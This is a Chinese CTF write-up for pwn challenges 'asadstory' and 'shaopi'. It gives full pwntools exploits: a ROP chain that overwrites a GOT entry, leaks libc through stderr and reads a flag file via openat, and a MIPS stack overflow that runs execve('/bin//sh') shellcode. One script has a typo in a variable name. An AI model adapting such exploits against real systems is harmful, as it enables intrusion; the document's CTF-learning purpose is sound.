DBASCTF And TPCTF

DBS and TP

DBSCTF CBCTF 2023 11月

asadstory

主要有两个难点:

1.程序关闭了标准输出,可以利用标准错误来实现输出。
2.沙盒禁用了read函数,可以使用***openat()来打开文件,注意openat***函数的用法格式

1
2
3
4
5
openat():
openat(int fd,const char *path,int oflag,...);
//fd=AT_FDCWD(指代当前目录,宏定义值为-100)
//*path指向文件路径,指定路径的文件通过读/写打开    ‘./flag’
//oflag,能够指定一个不存在的文件并创建             0

然后,就是改got表中read为syscall,调用write标准错误输出libc,然后orw。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
from pwn import *
context(arch = 'amd64', os = 'linux', log_level = 'debug')
# io = process("./challenge")
io = remote("node4.buuoj.cn", 28900)
elf = ELF("./challenge")
libc = elf.libc

io.sendlineafter("1.yes / 2.no\n", b'1')
io.sendlineafter("2.痛苦面具\n", b'1')
io.recvuntil("函数的地址:")
base = int(io.recv(14), 16) - 0x1249
success('base: ' + hex(base))

io.recvrepeat(1)
io.sendline(b'2')
payload = flat(cyclic(0x38),
           # read -> syscall
           base + 0x000000000000163A,
           0, 1, 0, base + elf.got['read'], 1, base + elf.got['read'],
           base + 0x0000000000001620,
           [0] * 7,

           # write
           base + 0x000000000000163A,
           0, 1, 2, base + elf.got['read'], 0x10, base + elf.got['read'],
           base + 0x0000000000001620,
           [0] * 7,
           base + 0x0000000000001468,
           )
io.sendline(plyload)
io.send(b'\xd0')

libc_base = u64(io.recvuntil(b'\x7f').ljust(8, b'\x00')) - 0x10dfd0
success('libc_base: ' + hex(libc_base))
p_rax_r = libc_base + 0x0000000000036174
p_rdx_r = libc_base + 0x0000000000142c92
p_rdi_r = libc_base + 0x0000000000023b6a
p_rsi_r = libc_base + 0x000000000002601f
syscall_ret = libc_base + 0x0000000000083f6c

pld = flat(cyclic(0x38),
           # read ./flag
           p_rax_r, 0,
           p_rdi_r, 0,
           p_rsi_r, base + 0x0000000000004100,
           p_rdx_r, 0x10,
           syscall_ret,

           # openat(AT_FDCWD, "./flag", 0)
           p_rax_r, 0x101,
           p_rdi_r, 0xffffffffffffff9c,
           p_rsi_r, base + 0x0000000000004100,
           p_rdx_r, 0,
           syscall_ret,
           
           # read
           p_rax_r, 0,
           p_rdi_r, 1,
           p_rsi_r, base + 0x0000000000004200,
           p_rdx_r, 0x30,
           syscall_ret,

           # write
           p_rax_r, 1,
           p_rdi_r, 2,
           p_rsi_r, base + 0x0000000000004200,
           p_rdx_r, 0x30,
           syscall_ret,
           )
io.sendline(pld)
io.send(b'./flag\x00')

io.interactive()

shaopi

好像是MIPS Pwn,要看得懂汇编
。。。。。。后续看
先贴一段别人的exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
from pwn import *

context(log_level = 'debug', arch = 'mips', endian = 'little')
sh = process(["qemu-mipsel","./challenge"])
# sh = gdb.debug("./challenge", 'b *0x00400CB4')

# 0x0043965C | addiu $a2,$sp,0x68+var_10 | jalr $fp
# 0x0040ABB8 | move $t9,$a2 | jalr $a2

sh.sendlineafter('your passphrase: ', '三元一串十元三串')
# shellcode = asm(shellcraft.mips.linux.sh())
# execve("/bin//sh", 0, 0)
shellcode = '''
lui $t6,0x6e69
ori $t6,$t6,0x622f
sw $t6,28($sp)

lui $t7,0x6873
ori $t7,$t7,0x2f2f
sw $t7,32($sp)
sw $zero,36($sp) 

la $a0,28($sp)

addiu $a1,$zero,0
addiu $a2,$zero,0
addiu $v0,$zero,4011

syscall 0x40404
'''
shellcode = asm(shellcode)
print(hex(len(shellcode)))
pld = cyclic(0x40) + p32(0x0040ABB8) + p32(0x0043965C)
pld = pld.ljust(0xa0, b'a') + shellcode
sh.sendafter('Congratulation!\n', pld)

sh.interactive()

TPCTF

1